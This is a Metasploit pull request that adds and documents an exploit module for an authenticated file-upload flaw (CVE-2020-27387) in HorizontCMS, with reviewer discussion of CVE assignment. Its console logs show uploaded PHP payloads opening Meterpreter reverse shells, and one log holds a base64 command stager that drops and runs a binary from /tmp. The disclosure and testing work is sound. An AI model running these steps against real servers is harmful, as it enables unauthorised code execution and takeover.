Add HorizontCMS 1.0.0-beta exploit module and documentation

[ErikWynter]

About

This change adds a new module to /modules/exploits/multi/http/ that exploits an arbitrary file upload vulnerability (CVE-2020-27387) in HorizontCMS 1.0.0-beta and prior in order to execute arbitrary commands. The change also adds documentation for this module. I discovered and disclosed the vulnerability, which has been fixed, but not in a specific version release.

Vulnerable system

HorizontCMS 1.0.0-beta and prior

Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: use exploit/multi/http/HorizontCMS_upload_exec
4. Do: set RHOSTS [IP]
5. Do: set USERNAME [username for the HorizontCMS account]
6. Do: set PASSWORD [password for the HorizontCMS account]
7. Do: set target [target]
8. Do: set payload [payload]
9. Do: set LHOST [IP]
10. Do: exploit

Options

PASSWORD

The password for the HorizontCMS account to authenticate with.

TARGETURI

The base path to HorizontCMS. The default value is /.

USERNAME

The username for the HorizontCMS account to authenticate with.

Targets

Id  Name
--  ----
0   PHP
1   Linux
2   Windows

Scenarios

HorizontCMS 1.0.0-beta running on Ubuntu 18.04) - PHP target

msf6 exploit(multi/http/horizontcms_upload_exec) > show options 
Module options (exploit/multi/http/horizontcms_upload_exec):
   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   PASSWORD   test              yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.227     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                 yes       The base path to HorizontCMS
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME   test              yes       Username to authenticate with
   VHOST      testhorizont.com  no        HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   PHP
msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as EaCPK1HSbRru.php...
[+] Successfully uploaded EaCPK1HSbRru.php. The server renamed it to Mflikdb8nNKTivXU3HPZnpsCy3nOu34FH1IsWaxl
[+] Successfully renamed payload back to EaCPK1HSbRru.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.1.227
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.227:49968) at 2020-10-31 15:52:57 -0400
[+] Successfully deleted EaCPK1HSbRru.php
meterpreter > getuid
Server username: www-data (33)
meterpreter >

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - Linux target

msf6 exploit(multi/http/horizontcms_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as W6nQKce4Uq.php...
[+] Successfully uploaded W6nQKce4Uq.php. The server renamed it to L6TL9BHTAckj6UrzfSyOBvAT3Bl2uFskRHrG3pXG
[+] Successfully renamed payload back to W6nQKce4Uq.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/W6nQKce4Uq.php?qo1E=<command>`
[*] Sending stage (3008420 bytes) to 192.168.1.227
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.227:49978) at 2020-10-31 15:56:58 -0400
[+] Successfully deleted W6nQKce4Uq.php
meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter > 

[ErikWynter]

Notes

• Please check the documentation for instructions on how to install vulnerable software for testing.
• This vulnerability has been patched, but not in an official version release. This means that for now, if HorizontCMS is obtained by cloning the repo from GitHub, the version is 1.0.0-beta but the target won't be vulnerable. This may result in false positives for the check method. However, this problem should go away when a new version is released.
• As with PR Add flexdotnetcms v1.5.8 exploit module and docs #14339 , I requested a CVE ID for this issue, but haven't heard anything from MITRE in close to 4 weeks. Because it has been patched, I didn't feel like sitting on it anymore. Plus I figured that this way, Tod at Rapid7 might be able to help assign the CVE.

[gwillcox-r7]

@todb-r7 Can you take a look into this? Another case of CVE-ID's being delayed.

[todb-r7]

I can hassle MITRE for this but usually the best bet for original Metasploit modules like this is to just ask Rapid7 for a CVE directly in the PR -- that way we're not in a race and end up issuing dupe CVEs like we did for CVE-2020-7373.

[todb-r7]

CVE Request 983476 filed to sort this out. @kalba-security do you happen to have a reference number from your original request?

[ErikWynter]

@gwillcox-r7 @todb-r7 Coincidentally, MITRE finally responded and assigned the CVE last night, so you could cancel the request you filed. I've added the cve (2020-27387) to the module and docs.

[todb-r7]

Coincidence, sure, let's call it that. :)

[ErikWynter]

Hahaha! I felt so relieved that I was willing to give them the benefit of the doubt. Fixed it ;)

[cdelafuente-r7]

Thanks for this great module @kalba-security ! I just left a few minor comments for you to review before it lands.

[ErikWynter]

Thanks for the suggestions @cdelafuente-r7 ! I added them in the latest commit.

[cdelafuente-r7]

Thanks for the updates @kalba-security. Everything looks good now. I tested against version HorizontCMS version 1.0.0-beta on Ubuntu 18.04 and I correctly got a session with both PHP and Linux targets. I wasn't able to make HorizontCMS work on Windows, so I couldn't test the third target (Windows). I will go ahead and land it.

Example output for target 0 (PHP)

msf6 exploit(multi/http/horizontcms_upload_exec) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/horizontcms_upload_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/horizontcms_upload_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/horizontcms_upload_exec) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(multi/http/horizontcms_upload_exec) > set LHOST 192.168.2.101
LHOST => 192.168.2.101
msf6 exploit(multi/http/horizontcms_upload_exec) > set verbose true
verbose => true
msf6 exploit(multi/http/horizontcms_upload_exec) > options

Module options (exploit/multi/http/horizontcms_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   123456           yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to HorizontCMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.101    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP


msf6 exploit(multi/http/horizontcms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.2.101:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Running check
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as El4ptDgvQ.php...
[+] Successfully uploaded El4ptDgvQ.php. The server renamed it to BOx9UhRDB8047n1hWnY76qD1acRnSr8kTR3KwyIC
[+] Successfully renamed payload back to El4ptDgvQ.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.2.101
[*] Meterpreter session 1 opened (192.168.2.101:4444 -> 192.168.2.101:53011) at 2020-11-13 12:45:48 +0100
[+] Successfully deleted El4ptDgvQ.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 08b0569bfdf0
OS          : Linux 08b0569bfdf0 5.4.39-linuxkit #1 SMP Fri May 8 23:03:06 UTC 2020 x86_64
Meterpreter : php/linux

Example output for target 1 (Linux)

msf6 exploit(multi/http/horizontcms_upload_exec) > set target 1
target => 1
msf6 exploit(multi/http/horizontcms_upload_exec) > options

Module options (exploit/multi/http/horizontcms_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   123456           yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to HorizontCMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.101    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf6 exploit(multi/http/horizontcms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.2.101:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Running check
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as LhajvAD4OG.php...
[+] Successfully uploaded LhajvAD4OG.php. The server renamed it to ZsR93xpskWpns43rwcgwrUcFnz3UdkqAIQxIYYxy
[+] Successfully renamed payload back to LhajvAD4OG.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/LhajvAD4OG.php?mjo9p=<command>`
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAALAEAAAAAAADgAQAAAAAAAAAQAAAAAAAA6ydbU1+wCPyudf1XWVNeigYwB0j/x0j/xmaBP8mDdAeAPgh16uvm/+Ho1P///wYITjf5bA9en7AWTo/QSzfPbCRHXLQBCQNOg8Z+V2wMR19WbC9en2wEWWwHWAkDToPGfj1OkU6/BAYXWsauBGNXTo/gbBZcbCxeCQNfToPGfyNP+c9yHlFsJV5sBmwDTo/hTjfwCQNfX1lOg8Z/wWw6XmwHWQkDWGx4XAkDToPGfuv54MmD>>'/tmp/SNIva.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/XeSxZ' < '/tmp/SNIva.b64' ; chmod +x '/tmp/XeSxZ' ; '/tmp/XeSxZ' & sleep 2 ; rm -f '/tmp/XeSxZ' ; rm -f '/tmp/SNIva.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.2.101
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.2.101:4444 -> 192.168.2.101:53068) at 2020-11-13 12:46:16 +0100
[+] Successfully deleted LhajvAD4OG.php

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 18.04 (Linux 5.4.39-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data @ 08b0569bfdf0 (uid=33, gid=33, euid=33, egid=33)

[cdelafuente-r7]

Release Notes

New module exploits/multi/http/horizontcms_upload_exec leverages an arbitrary file upload vulnerability in HorizontCMS 1.0.0-beta (and prior) to achieve authenticated RCE (CVE-2020-27387).